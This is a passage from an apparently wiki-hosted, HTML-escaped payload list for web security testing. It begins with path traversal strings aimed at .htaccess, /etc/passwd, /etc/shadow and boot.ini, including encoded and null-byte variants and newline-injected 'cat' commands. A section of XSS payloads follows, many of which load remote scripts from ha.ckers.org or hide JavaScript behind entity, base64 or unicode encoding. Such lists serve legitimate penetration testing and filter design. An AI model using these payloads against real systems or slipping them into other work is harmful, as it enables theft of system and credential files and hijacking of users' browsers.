%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;amp;apos;&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.'' &lt;br /&gt;
&lt;br /&gt;
=== XSS Statements - Most effective/most common statements  ===&lt;br /&gt;
&lt;br /&gt;
Testing Statements &lt;br /&gt;
&amp;lt;pre&amp;gt;';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
Common exploit code (covers a lot of XSS vulnerabilities) &lt;br /&gt;
&amp;lt;pre&amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== XSS Statements (Full List) - (Update: 11 August 2009 - Total Statements: 162) &lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;SCR\0IPT&amp;amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;lt;/SCR\0IPT&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY onload!#$%&amp;amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;amp;lt;B&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;amp;lt;&lt;br /&gt;
&amp;amp;lt;SCRIPT&amp;amp;gt;a=/XSS/\nalert(a.source)&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;\&amp;quot;&amp;quot;;alert('XSS');//&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;/TITLE&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;INPUT TYPE=&amp;quot;&amp;quot;IMAGE&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;BODY ONLOAD=alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG DYNSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG LOWSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BGSOUND SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BR SIZE=&amp;quot;&amp;quot;&amp;amp;amp;{alert('XSS')}&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LAYER SRC=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/LAYER&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;STYLE&amp;amp;gt;@import'http://ha.ckers.org/xss.css';&amp;amp;lt;/STYLE&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Link&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;&amp;amp;lt;http://ha.ckers.org/xss.css&amp;amp;gt;; REL=stylesheet&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;BODY{-moz-binding:url(&amp;quot;&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;li {list-style-image: url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;UL&amp;amp;gt;&amp;amp;lt;LI&amp;amp;gt;XSS&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)'&amp;amp;gt;&amp;quot;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IFRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/IFRAME&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;FRAMESET&amp;amp;gt;&amp;amp;lt;FRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/FRAMESET&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE&amp;amp;gt;&amp;amp;lt;TD BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(&amp;amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)';&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG STYLE=&amp;quot;&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;exp/*&amp;amp;lt;A STYLE='no\xss:noxss(&amp;quot;&amp;quot;*//*&amp;quot;&amp;quot;);xss:ex/*XSS*//*/*/pression(alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;))'&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE TYPE=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;alert('XSS');&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;.XSS{background-image:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;A CLASS=XSS&amp;amp;gt;&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE type=&amp;quot;&amp;quot;text/css&amp;quot;&amp;quot;&amp;amp;gt;BODY{background:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;!--[if gte IE 4]&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS');&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;![endif]--&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BASE HREF=&amp;quot;&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;OBJECT TYPE=&amp;quot;&amp;quot;text/x-scriptlet&amp;quot;&amp;quot; DATA=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;amp;gt;&amp;amp;lt;param name=url value=javascript:alert('XSS')&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.swf&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot;&amp;quot; type=&amp;quot;&amp;quot;image/svg+xml&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML&amp;amp;gt;&amp;amp;lt;BODY&amp;amp;gt;&amp;amp;lt;?xml:namespace prefix=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; ns=&amp;quot;&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;#default#time2&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;t:set attributeName=&amp;quot;&amp;quot;innerHTML&amp;quot;&amp;quot; to=&amp;quot;&amp;quot;XSS&amp;amp;lt;SCRIPT DEFER&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/BODY&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
